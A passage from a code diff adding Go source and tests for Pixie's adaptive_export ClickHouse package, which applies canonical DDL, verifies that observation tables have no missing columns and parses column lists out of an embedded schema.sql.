+		_, err := a.c.Insert(ctx, stmt, jsonEachRow, chhttp.InsertOptions{})
+		return err
+	}
+	return nil
+}
+
+// execute is the DDL primitive: it runs sql via Exec and returns only the error.
+func (a *Applier) execute(ctx context.Context, sql string) error {
+	_, err := a.c.Exec(ctx, sql)
+	return err
+}
+
+// SchemaDriftError is returned by VerifyPixieSchema when a pixie
+// observation table lacks one or more expected columns. It is returned as
+// a pointer carrying fields, so extract it with errors.As (not errors.Is).
+type SchemaDriftError struct {
+	Table   string   // table whose column set is incomplete
+	Missing []string // expected column names absent from that table
+}
+
+func (e *SchemaDriftError) Error() string {
+	missing := strings.Join(e.Missing, ", ")
+	return fmt.Sprintf("clickhouse: pixie table %q schema drift, missing columns: %s", e.Table, missing)
+}
+
+// requiredPixieColumns are the columns every pixie observation table
+// MUST have for adaptive_attribution JOINs to work. namespace + pod are
+// our additions over Pixie's auto-DDL; hostname + time_ are Pixie's own.
+// VerifyPixieSchema checks these in addition to Columns(table).
+var requiredPixieColumns = []string{"namespace", "pod", "hostname", "time_"}
+
+// VerifyPixieSchema queries system.columns for each pixie observation
+// table and confirms EVERY column AE writes for that table is present
+// in CH. This is the **writer ⇔ schema contract** test (the T1 in
+// the operator's PR #47 schema-loss report on 2026-06-07).
+//
+// The earlier shape of this function only checked the 4
+// operator-required columns (namespace/pod/hostname/time_) — a table
+// could be hand-created with those four plus a different subset of
+// data columns and pass verification, while AE's writer would post
+// JSON containing the column names schema.sql says the table should
+// have. The result on rig 6a25c85c: CH silently dropped 22 of 24
+// columns into nothing because they were "unknown fields"
+// (input_format_skip_unknown_fields default = 1), AE's
+// summaryWroteFewerThan saw written_rows=0 / rows_sent=259 only AFTER
+// the data was lost, and the controller hot-looped on the rejection.
+//
+// The expanded contract: for every table in PixieTables(), CH's
+// actual column set must be a superset of clickhouse.Columns(table) —
+// i.e. the canonical column list parsed out of schema.sql, which IS
+// the single source of truth.
+//
+// Returns the FIRST drift detected as *SchemaDriftError. Callers
+// usually want to log loudly and refuse to start so the misconfig
+// is visible — silently continuing leaves the table with a schema
+// the AE writer can't actually populate.
+func (a *Applier) VerifyPixieSchema(ctx context.Context) error {
+	for _, table := range PixieTables() {
+		// Columns ClickHouse actually reports for this table.
+		live, err := a.tableColumns(ctx, table)
+		if err != nil {
+			return fmt.Errorf("verify %s: %w", table, err)
+		}
+		// The canonical column shape AE expects (schema.sql).
+		expected, err := Columns(table)
+		if err != nil {
+			return fmt.Errorf("verify %s: load expected columns: %w", table, err)
+		}
+		// Index the live columns so each membership probe is a map lookup.
+		present := make(map[string]bool, len(live))
+		for _, c := range live {
+			present[c] = true
+		}
+		// Walk schema.sql's columns first, then the operator-required ones;
+		// checked dedupes so a name is examined (and reported) at most once.
+		checked := make(map[string]bool, len(expected)+len(requiredPixieColumns))
+		var missing []string
+		for _, group := range [][]string{expected, requiredPixieColumns} {
+			for _, name := range group {
+				if checked[name] {
+					continue
+				}
+				checked[name] = true
+				if !present[name] {
+					missing = append(missing, name)
+				}
+			}
+		}
+		if len(missing) > 0 {
+			return &SchemaDriftError{Table: table, Missing: missing}
+		}
+	}
+	return nil
+}
+
+// tableColumns lists the column names of forensic_db.<table> as
+// reported by system.columns.
+func (a *Applier) tableColumns(ctx context.Context, table string) ([]string, error) {
+	query := "SELECT name FROM system.columns WHERE database='forensic_db' AND table=" +
+		quoteCH(table) + " FORMAT JSONEachRow"
+	body, err := a.c.Query(ctx, query)
+	if err != nil {
+		return nil, err
+	}
+	var names []string
+	// One JSON object per line; blank lines (e.g. after the last newline) are skipped.
+	for _, raw := range bytes.Split(body, []byte("\n")) {
+		raw = bytes.TrimSpace(raw)
+		if len(raw) == 0 {
+			continue
+		}
+		var rec struct {
+			Name string `json:"name"`
+		}
+		if err := json.Unmarshal(raw, &rec); err != nil {
+			return nil, fmt.Errorf("parse system.columns row: %w", err)
+		}
+		names = append(names, rec.Name)
+	}
+	return names, nil
+}
+
+func quoteCH(s string) string { // single-quoted SQL literal; \ and ' are backslash-escaped
+	escaped := strings.NewReplacer(`\`, `\\`, `'`, `\'`).Replace(s)
+	return "'" + escaped + "'"
+}
+
+// contains reports whether x is an element of s.
+func contains(s []string, x string) bool {
+	found := false
+	for i := 0; i < len(s) && !found; i++ {
+		found = s[i] == x
+	}
+	return found
+}
diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/apply_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/apply_test.go
new file mode 100644
index 00000000000..e108e05540c
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/apply_test.go
@@ -0,0 +1,266 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package clickhouse
+
+import (
+ "context"
+ "errors"
+ "fmt"
+ "io"
+ "net/http"
+ "net/http/httptest"
+ "strings"
+ "sync"
+ "sync/atomic"
+ "testing"
+)
+
+// TestApply_ExecutesEveryOperatorOwnedTable — Apply sends CREATE DATABASE
+// and then one DDL per OperatorOwnedTables entry, in order. The kubescape
+// tables (alerts, kubescape_logs) belong to the soc installer and are skipped.
+func TestApply_ExecutesEveryOperatorOwnedTable(t *testing.T) {
+	var mu sync.Mutex
+	var sent []string // request bodies, in arrival order
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		payload, _ := io.ReadAll(r.Body)
+		mu.Lock()
+		sent = append(sent, string(payload))
+		mu.Unlock()
+		w.WriteHeader(200)
+	}))
+	defer srv.Close()
+	applier, err := NewApplier(srv.URL, "", "")
+	if err != nil {
+		t.Fatalf("NewApplier: %v", err)
+	}
+	if err := applier.Apply(context.Background()); err != nil {
+		t.Fatalf("Apply: %v", err)
+	}
+	// 1 CREATE DATABASE + len(OperatorOwnedTables) CREATE TABLE calls.
+	if got, want := len(sent), len(OperatorOwnedTables)+1; got != want {
+		t.Fatalf("Apply made %d calls, want %d", got, want)
+	}
+	if !strings.Contains(sent[0], "CREATE DATABASE IF NOT EXISTS forensic_db") {
+		t.Fatalf("first DDL must create the database; got: %s", sent[0])
+	}
+	// Check both ends of the table sequence: the call right after CREATE
+	// DATABASE and the final call. Robust to new tables being appended.
+	firstTable := OperatorOwnedTables[0]
+	if !strings.Contains(sent[1], "forensic_db."+firstTable) {
+		t.Fatalf("second DDL not for %s; got: %s", firstTable, sent[1])
+	}
+	lastTable := OperatorOwnedTables[len(OperatorOwnedTables)-1]
+	if !strings.Contains(sent[len(sent)-1], "forensic_db."+lastTable) {
+		t.Fatalf("last DDL not for %s; got: %s", lastTable, sent[len(sent)-1])
+	}
+	// And ensure no kubescape DDL leaked through.
+	for _, body := range sent {
+		if strings.Contains(body, "forensic_db.alerts") || strings.Contains(body, "forensic_db.kubescape_logs") {
+			t.Fatalf("operator's Apply must not create kubescape tables; got:\n%s", body)
+		}
+	}
+}
+
+// TestApply_FailsFastOnHTTPError — when a statement gets a non-2xx
+// response, Apply returns at once and sends no later statements.
+func TestApply_FailsFastOnHTTPError(t *testing.T) {
+	// The handler runs on the server's goroutine while the test goroutine
+	// reads the counter after Apply returns. atomic.Int32 keeps that
+	// access race-free on its own, without leaning on the ordering the
+	// HTTP round trip happens to provide.
+	var hits atomic.Int32
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		seq := hits.Add(1)
+		if seq == 1 {
+			w.WriteHeader(500)
+			_, _ = w.Write([]byte("ddl exploded"))
+			return
+		}
+		w.WriteHeader(200)
+	}))
+	defer srv.Close()
+	applier, err := NewApplier(srv.URL, "", "")
+	if err != nil {
+		t.Fatalf("NewApplier: %v", err)
+	}
+	if err := applier.Apply(context.Background()); err == nil {
+		t.Fatalf("expected error from Apply on HTTP 500")
+	}
+	if got := hits.Load(); got != 1 {
+		t.Fatalf("Apply continued past first failure; calls = %d", got)
+	}
+}
+
+// tableForQuery extracts the table name from a system.columns query like
+// "...AND table='http_events' FORMAT JSONEachRow"; "" if it cannot be found.
+func tableForQuery(q string) string {
+	// Everything after the first "table='" marker...
+	_, after, ok := strings.Cut(q, "table='")
+	if !ok {
+		return ""
+	}
+	// ...up to (not including) the next single quote.
+	name, _, ok := strings.Cut(after, "'")
+	if !ok {
+		return ""
+	}
+	return name
+}
+
+// TestVerifyPixieSchema_DetectsMissingColumns — defensive guard.
+// On rig 6a25c85c (PR #47 schema-loss report), http_events was created
+// by a hand-maintained stopgap that DIDN'T include req_path /
+// req_headers / etc. — the columns AE's writer puts into JSONEachRow
+// posts. The old VerifyPixieSchema only checked namespace/pod/hostname/
+// time_, so it passed; the writer's 22 unknown fields then got silently
+// dropped by CH at default settings. The expanded contract verifies that
+// EVERY column AE expects per table is present in CH (the writer ⇔
+// schema contract). This test reproduces the rig 6a25c85c shape:
+// http_events comes back with the operator-required columns (plus upid)
+// but without the data columns the writer fills.
+func TestVerifyPixieSchema_DetectsMissingColumns(t *testing.T) {
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		// http_events reports just five columns — enough to satisfy the
+		// old four-column check, but none of the data columns the writer
+		// fills. That is the regression shape.
+		table := tableForQuery(r.URL.Query().Get("query"))
+		if table == "http_events" {
+			// One JSONEachRow line per stubbed column name.
+			stub := []string{"time_", "upid", "namespace", "pod", "hostname"}
+			for _, col := range stub {
+				fmt.Fprintf(w, "{\"name\":%q}\n", col)
+			}
+			return
+		}
+		// Other tables (won't be reached) — fully populated.
+		cols, _ := Columns(table)
+		for _, c := range cols {
+			fmt.Fprintf(w, "{\"name\":%q}\n", c)
+		}
+	}))
+	defer srv.Close()
+	applier, err := NewApplier(srv.URL, "", "")
+	if err != nil {
+		t.Fatalf("NewApplier: %v", err)
+	}
+	err = applier.VerifyPixieSchema(context.Background())
+	if err == nil {
+		t.Fatalf("expected SchemaDriftError; got nil")
+	}
+	var drift *SchemaDriftError
+	if !errors.As(err, &drift) {
+		t.Fatalf("err type = %T, want *SchemaDriftError", err)
+	}
+	if drift.Table != "http_events" {
+		t.Fatalf("first drift = %q, want http_events", drift.Table)
+	}
+	// Spot-check that several of the data columns the writer fills are
+	// reported missing — this is the coverage the four-column check
+	// lacked.
+	for _, want := range []string{"req_path", "req_headers", "resp_status", "latency"} {
+		if !contains(drift.Missing, want) {
+			t.Errorf("Missing should include %q (writer-column drift); got %v", want, drift.Missing)
+		}
+	}
+}
+
+// TestVerifyPixieSchema_AllPresent — happy path. The stub server answers
+// each system.columns query with the full schema.sql column list for the
+// requested table, so VerifyPixieSchema finds no drift and returns nil.
+func TestVerifyPixieSchema_AllPresent(t *testing.T) {
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		requested := tableForQuery(r.URL.Query().Get("query"))
+		names, err := Columns(requested)
+		if err != nil {
+			http.Error(w, err.Error(), 500)
+			return
+		}
+		for _, name := range names {
+			fmt.Fprintf(w, "{\"name\":%q}\n", name)
+		}
+	}))
+	defer srv.Close()
+	applier, err := NewApplier(srv.URL, "", "")
+	if err != nil {
+		t.Fatalf("NewApplier: %v", err)
+	}
+	if err := applier.VerifyPixieSchema(context.Background()); err != nil {
+		t.Fatalf("VerifyPixieSchema: %v", err)
+	}
+}
+
+// TestNewApplier_RejectsBadEndpoint — empty and unparsable endpoints must error.
+func TestNewApplier_RejectsBadEndpoint(t *testing.T) {
+	// Each pair is {endpoint, failure message if it is accepted}.
+	for _, tc := range [][2]string{{"", "empty endpoint not rejected"}, {"http://%zz", "malformed endpoint not rejected"}} {
+		if _, err := NewApplier(tc[0], "", ""); err == nil {
+			t.Fatal(tc[1])
+		}
+	}
+}
+
+// TestOperatorOwnedTables_DoesNotIncludeKubescape — structural guard:
+// neither kubescape table may ever appear in OperatorOwnedTables.
+func TestOperatorOwnedTables_DoesNotIncludeKubescape(t *testing.T) {
+	for _, kubescapeTable := range []string{"alerts", "kubescape_logs"} {
+		if contains(OperatorOwnedTables, kubescapeTable) {
+			t.Fatalf("%q must not be in OperatorOwnedTables (it belongs to the soc installer)", kubescapeTable)
+		}
+	}
+}
+
+// TestOperatorOwnedTables_TrailingOperatorTables — ordering guard: pixie
+// observation tables come first (before the retention plugin can auto-DDL
+// them), then the operator's own write targets in this exact order.
+func TestOperatorOwnedTables_TrailingOperatorTables(t *testing.T) {
+	want := []string{"adaptive_attribution", "trigger_watermark", "ae_reconcile", "dx_attack_graph", "dx_attack_graph_malicious"}
+	if len(OperatorOwnedTables) < len(want) { // guard: slicing below would panic otherwise
+		t.Fatalf("OperatorOwnedTables has %d entries, want at least %d", len(OperatorOwnedTables), len(want))
+	}
+	got := OperatorOwnedTables[len(OperatorOwnedTables)-len(want):]
+	if strings.Join(got, ",") != strings.Join(want, ",") {
+		t.Fatalf("OperatorOwnedTables tail = %v, want %v", got, want)
+	}
+}
+
+// TestOperatorOwnedTables_CoversAllPixieTables — drift guard between the
+// boot-time Apply (OperatorOwnedTables, apply.go) and the verify path
+// that uses ddl.go's KnownTables / PixieTables. aeprod3/4/5 shipped with
+// the two lists out of sync: ddl.go's PixieTables() included "conn_stats"
+// (re-added in commit a54a1f6d3) but OperatorOwnedTables
+// did not, so Apply created 14 tables and Verify expected 15 — AE fatal'd
+// at boot with `pixie table schema drift detected … conn_stats schema
+// drift, missing columns`. Anyone adding a new pixie observation table in
+// the future MUST add it to both lists; this test fails loudly otherwise.
+func TestOperatorOwnedTables_CoversAllPixieTables(t *testing.T) {
+	owned := make(map[string]struct{}, len(OperatorOwnedTables))
+	for _, name := range OperatorOwnedTables {
+		owned[name] = struct{}{}
+	}
+	var uncovered []string
+	for _, pixie := range PixieTables() {
+		if _, ok := owned[pixie]; !ok {
+			uncovered = append(uncovered, pixie)
+		}
+	}
+	if len(uncovered) > 0 {
+		t.Fatalf("PixieTables() not covered by OperatorOwnedTables: %v "+
+			"(adding a pixie table requires updating BOTH apply.go OperatorOwnedTables "+
+			"and ddl.go KnownTables+PixieTables — drift causes the boot-time schema "+
+			"verify to fail with \"missing columns\")", uncovered)
+	}
+}
diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/columns_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/columns_test.go
new file mode 100644
index 00000000000..2e3a94bfb73
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/columns_test.go
@@ -0,0 +1,130 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package clickhouse
+
+import (
+ "reflect"
+ "strings"
+ "testing"
+)
+
+// http_events is the shape AE writes most often (and the bench shape).
+// The exact ordered column list is pinned here, so dropping, renaming or
+// reordering a column in schema.sql fails this test immediately.
+func TestColumns_http_events_ExactList(t *testing.T) {
+	expected := []string{
+		"time_", "upid", "namespace", "pod",
+		"remote_addr", "remote_port", "local_addr", "local_port",
+		"trace_role", "encrypted", "major_version", "minor_version",
+		"content_type", "req_headers", "req_method", "req_path",
+		"req_body", "req_body_size", "resp_headers", "resp_status",
+		"resp_message", "resp_body", "resp_body_size", "latency",
+		"hostname", "event_time",
+	}
+	cols, err := Columns("http_events")
+	if err != nil {
+		t.Fatalf("Columns: %v", err)
+	}
+	if !reflect.DeepEqual(cols, expected) {
+		t.Fatalf("Columns(http_events) mismatch:\n got=%v\nwant=%v", cols, expected)
+	}
+}
+
+// conn_stats is the column shape pinned by the rev-2 schema; if anyone
+// drops or renames a column the bench-encoder fast-path would silently
+// emit the wrong JSON, so this guard is mandatory.
+func TestColumns_conn_stats_ExactList(t *testing.T) {
+	expected := []string{
+		"time_", "upid", "namespace", "pod",
+		"remote_addr", "remote_port", "trace_role", "addr_family",
+		"protocol", "ssl", "conn_open", "conn_close", "conn_active",
+		"bytes_sent", "bytes_recv", "hostname", "event_time",
+	}
+	cols, err := Columns("conn_stats")
+	if err != nil {
+		t.Fatalf("Columns: %v", err)
+	}
+	if !reflect.DeepEqual(cols, expected) {
+		t.Fatalf("Columns(conn_stats) mismatch:\n got=%v\nwant=%v", cols, expected)
+	}
+}
+
+// Every table in PixieTables() must successfully parse, and each must
+// include the operator-mandated namespace + pod columns plus the
+// retention-plugin-mandated hostname + event_time columns.
+func TestColumns_AllPixieTables_HaveOperatorColumns(t *testing.T) {
+	for _, table := range PixieTables() {
+		cols, err := Columns(table)
+		if err != nil {
+			t.Errorf("Columns(%q): %v", table, err)
+			continue
+		}
+		// Index the parsed columns once, then probe for each required
+		// name; every absent column is reported (Errorf, not Fatalf) so
+		// a single run lists all gaps across all tables.
+		have := make(map[string]bool, len(cols))
+		for _, c := range cols {
+			have[c] = true
+		}
+		for _, required := range []string{"namespace", "pod", "hostname", "event_time"} {
+			if !have[required] {
+				t.Errorf("Columns(%q) missing required column %q (cols=%v)", table, required, cols)
+			}
+		}
+	}
+}
+
+// Dotted table names (backtick-quoted in schema.sql) resolve to a non-empty list.
+func TestColumns_DottedTables(t *testing.T) {
+	for _, dotted := range []string{"http2_messages.beta", "kafka_events.beta"} {
+		cols, err := Columns(dotted)
+		if err != nil {
+			t.Errorf("Columns(%q): %v", dotted, err)
+			continue
+		}
+		if len(cols) == 0 {
+			t.Errorf("Columns(%q): empty", dotted)
+		}
+	}
+}
+
+// Unknown tables yield an "unknown table" error (ErrUnknownTable) so callers
+// (sink) can fall back to the encoding/json slow path safely.
+func TestColumns_UnknownTable_ErrUnknownTable(t *testing.T) {
+	_, err := Columns("not_a_real_table")
+	if !(err != nil && strings.Contains(err.Error(), "unknown table")) {
+		t.Fatalf("expected ErrUnknownTable for unknown table, got %v", err)
+	}
+}
+
+// Repeated lookups for the same table return the same content. (The
+// underlying parser may or may not cache — the sink's fast-path
+// encoder caches the column slice itself once per table; this test only
+// pins that the public Columns() answer is stable across calls.)
+func TestColumns_Repeated_StableResult(t *testing.T) {
+	first, err := Columns("dns_events")
+	if err != nil {
+		t.Fatal(err)
+	}
+	second, err := Columns("dns_events")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !reflect.DeepEqual(first, second) {
+		t.Fatalf("Columns(dns_events) drift across calls: a=%v b=%v", first, second)
+	}
+}
diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/ddl.go b/src/vizier/services/adaptive_export/internal/clickhouse/ddl.go
new file mode 100644
index 00000000000..e4503bb340c
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/ddl.go
@@ -0,0 +1,137 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package clickhouse owns the canonical ClickHouse DDL for the
+// forensic_db tables that adaptive_export reads (kubescape_logs) and
+// the 12 socket_tracer tables Pixie's retention plugin writes (which
+// the operator joins against via forensic_db.adaptive_attribution).
+//
+// schema.sql is the single source of truth. The operator never invents
+// SQL — it always extracts statements verbatim from the embedded copy.
+package clickhouse
+
+import (
+ _ "embed"
+ "errors"
+ "fmt"
+ "strings"
+)
+
+//go:embed schema.sql
+var canonicalSchema string // full text of schema.sql; DDL slices statements out of it
+
+// KnownTables enumerates every forensic_db table the operator is aware
+// of, in the order they appear in schema.sql; DDL and Columns reject any
+// name not listed here. Dotted names (e.g. "http2_messages.beta") are
+// listed without backticks; DDL() reinjects them.
+var KnownTables = []string{
+	// non-pixie
+	"alerts",
+	"kubescape_logs",
+	// 12 socket_tracer pixie observation tables
+	"http_events",
+	"http2_messages.beta",
+	"dns_events",
+	"redis_events",
+	"mysql_events",
+	"pgsql_events",
+	"cql_events",
+	"mongodb_events",
+	"kafka_events.beta",
+	"amqp_events",
+	"mux_events",
+	"tls_events",
+	// conn_stats — re-added to rev-2 schema; counts per
+	// (remote_addr, remote_port, protocol) on each retention-script pull.
+	"conn_stats",
+	// operator-owned attribution table
+	"adaptive_attribution",
+	// operator-owned persistent trigger cursor
+	"trigger_watermark",
+	// operator-owned per-pull write-fidelity instrument (ADAPTIVE_RECONCILE).
+	// NOT a pixie table — absent from PixieTables().
+	"ae_reconcile",
+	// operator-owned dx evidence-graph edge list (read by the Pixie
+	// dx_evidence_graph UI via clickhouse_dsn). NOT a pixie table.
+	"dx_attack_graph",
+	// rule-ins-only VIEW over dx_attack_graph (condition != ''); the
+	// dx_evidence_graph UI reads this by default so benign rows are filtered
+	// in ClickHouse, not pulled. Must follow dx_attack_graph (depends on it).
+	"dx_attack_graph_malicious",
+}
+
+// ErrUnknownTable is returned (wrapped, so match it with errors.Is) by DDL
+// and Columns when asked for a table not in KnownTables.
+var ErrUnknownTable = errors.New("clickhouse: unknown table")
+
+// DDL returns the canonical CREATE TABLE (or CREATE VIEW) statement for the
+// named table, sliced verbatim out of the embedded schema.sql.
+func DDL(table string) (string, error) {
+	if !isKnown(table) {
+		return "", fmt.Errorf("%w: %q", ErrUnknownTable, table)
+	}
+	// Dotted ClickHouse identifiers are backtick-quoted in schema.sql.
+	// NOTE(review): headers are matched by plain substring, not whole name.
+	name := table
+	if strings.Contains(table, ".") {
+		name = "`" + table + "`"
+	}
+	headers := []string{"CREATE TABLE IF NOT EXISTS forensic_db." + name, "CREATE VIEW IF NOT EXISTS forensic_db." + name}
+	at := strings.Index(canonicalSchema, headers[0])
+	if at < 0 {
+		at = strings.Index(canonicalSchema, headers[1])
+	}
+	if at < 0 {
+		return "", fmt.Errorf("%w: %q registered in KnownTables but not present in embedded schema.sql", ErrUnknownTable, table)
+	}
+	// The statement runs from its header through the first ';' after it.
+	stmt := canonicalSchema[at:]
+	end := strings.Index(stmt, ";")
+	if end < 0 {
+		return "", fmt.Errorf("malformed schema.sql: no terminating ';' after %q", table)
+	}
+	return stmt[:end+1], nil
+}
+
+// PixieTables returns the subset of KnownTables that are pixie
+// observation tables (the JOIN targets for adaptive_attribution): the
+// socket_tracer tables plus conn_stats. A new slice is built on each call.
+func PixieTables() []string {
+	return []string{
+		"http_events",
+		"http2_messages.beta",
+		"dns_events",
+		"redis_events",
+		"mysql_events",
+		"pgsql_events",
+		"cql_events",
+		"mongodb_events",
+		"kafka_events.beta",
+		"amqp_events",
+		"mux_events",
+		"tls_events",
+		"conn_stats",
+	}
+}
+
+// isKnown reports whether name is listed in KnownTables.
+func isKnown(name string) bool {
+	known := false
+	for i := 0; i < len(KnownTables) && !known; i++ {
+		known = KnownTables[i] == name
+	}
+	return known
+}
diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/ddl_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/ddl_test.go
new file mode 100644
index 00000000000..0da8c706d3d
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/ddl_test.go
@@ -0,0 +1,143 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package clickhouse
+
+import (
+ "errors"
+ "strings"
+ "testing"
+)
+
+// TestDDL_ReturnsCanonicalForKnownTables — every table named in KnownTables
+// can be extracted as a complete CREATE TABLE / CREATE VIEW statement.
+func TestDDL_ReturnsCanonicalForKnownTables(t *testing.T) {
+	for _, name := range KnownTables {
+		t.Run(name, func(t *testing.T) {
+			stmt, err := DDL(name)
+			if err != nil {
+				t.Fatalf("DDL(%q): %v", name, err)
+			}
+			okPrefix := strings.HasPrefix(stmt, "CREATE TABLE IF NOT EXISTS forensic_db.") || strings.HasPrefix(stmt, "CREATE VIEW IF NOT EXISTS forensic_db.")
+			if !okPrefix {
+				t.Fatalf("DDL(%q) wrong prefix: %q", name, stmt[:minInt(70, len(stmt))])
+			}
+			if !strings.HasSuffix(stmt, ";") {
+				t.Fatalf("DDL(%q) does not terminate with ';'", name)
+			}
+		})
+	}
+}
+
+// TestDDL_PixieTablesIncludeNamespaceAndPod — every pixie table must
+// declare namespace + pod columns (used by attribution JOINs).
+func TestDDL_PixieTablesIncludeNamespaceAndPod(t *testing.T) {
+	for _, name := range PixieTables() {
+		t.Run(name, func(t *testing.T) {
+			stmt, err := DDL(name)
+			if err != nil {
+				t.Fatalf("DDL(%q): %v", name, err)
+			}
+			// Substring probe over the whole statement, not a column parse.
+			for _, col := range []string{"namespace", "pod"} {
+				if !strings.Contains(stmt, col) {
+					t.Fatalf("%s missing %s column", name, col)
+				}
+			}
+		})
+	}
+}
+
+// TestDDL_PixieTables_NoAnomalyHashColumn — pixie observation tables
+// MUST NOT carry the hash inline; attribution is via JOIN.
+func TestDDL_PixieTables_NoAnomalyHashColumn(t *testing.T) {
+	for _, name := range PixieTables() {
+		t.Run(name, func(t *testing.T) {
+			stmt, err := DDL(name)
+			if err != nil {
+				t.Fatalf("DDL(%q): %v", name, err)
+			}
+			if strings.Contains(stmt, "anomaly_hash") { // also matches "anomaly_hashes"
+				t.Fatalf("pixie table %q must not carry anomaly_hash column; got:\n%s", name, stmt)
+			}
+		})
+	}
+}
+
+// TestDDL_AdaptiveAttribution_HasExpectedColumns — pins the attribution
+// table's column names and its ReplacingMergeTree(t_end) engine.
+func TestDDL_AdaptiveAttribution_HasExpectedColumns(t *testing.T) {
+	stmt, err := DDL("adaptive_attribution")
+	if err != nil {
+		t.Fatalf("DDL: %v", err)
+	}
+	for _, col := range []string{
+		"anomaly_hash", "namespace", "pod", "comm", "pid",
+		"hostname", "t_start", "t_end", "last_seen",
+	} {
+		if !strings.Contains(stmt, col) {
+			t.Fatalf("adaptive_attribution missing column %q; got:\n%s", col, stmt)
+		}
+	}
+	if !strings.Contains(stmt, "ReplacingMergeTree(t_end)") {
+		t.Fatalf("adaptive_attribution must use ReplacingMergeTree(t_end); got:\n%s", stmt)
+	}
+}
+
+// TestDDL_KubescapeLogs_PreservesAnomalyHash — kubescape_logs keeps its
+// existing anomaly_hash DEFAULT '' column for pipeline compat.
+func TestDDL_KubescapeLogs_PreservesAnomalyHash(t *testing.T) {
+	stmt, err := DDL("kubescape_logs")
+	if err != nil {
+		t.Fatalf("DDL: %v", err)
+	}
+	if hasHash := strings.Contains(stmt, "anomaly_hash"); !hasHash {
+		t.Fatalf("kubescape_logs lost anomaly_hash column: %s", stmt)
+	}
+}
+
+// TestDDL_UnknownTable_ErrUnknownTable — defensive contract: names outside
+// KnownTables (including "") must yield an error matching ErrUnknownTable.
+func TestDDL_UnknownTable_ErrUnknownTable(t *testing.T) {
+	for _, name := range []string{"", "no_such_table", "process_events"} {
+		if _, err := DDL(name); !errors.Is(err, ErrUnknownTable) {
+			t.Fatalf("DDL(%q) → %v, want ErrUnknownTable", name, err)
+		}
+	}
+}
+
+// TestDDL_DottedTableName_BacktickQuoted — the statement DDL returns for a
+// dotted table name must carry that name wrapped in backticks.
+func TestDDL_DottedTableName_BacktickQuoted(t *testing.T) {
+	for _, dotted := range []string{"http2_messages.beta", "kafka_events.beta"} {
+		t.Run(dotted, func(t *testing.T) {
+			stmt, err := DDL(dotted)
+			if err != nil {
+				t.Fatalf("DDL(%q): %v", dotted, err)
+			}
+			if !strings.Contains(stmt, "`"+dotted+"`") {
+				t.Fatalf("dotted table %q must be backtick-quoted; got:\n%s", dotted, stmt)
+			}
+		})
+	}
+}
+
+func minInt(a, b int) int { // smaller of a and b
+	if b < a {
+		return b
+	}
+	return a
+}
diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/insert.go b/src/vizier/services/adaptive_export/internal/clickhouse/insert.go
new file mode 100644
index 00000000000..1d76c286760
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/insert.go
@@ -0,0 +1,114 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package clickhouse
+
+import (
+ "fmt"
+ "strings"
+)
+
+// Columns lists the column names of forensic_db.<table> in declaration
+// order. The names are parsed out of the statement that DDL(table) returns;
+// when DDL rejects the table, its error is passed through unchanged.
+func Columns(table string) ([]string, error) {
+	stmt, ddlErr := DDL(table)
+	if ddlErr != nil {
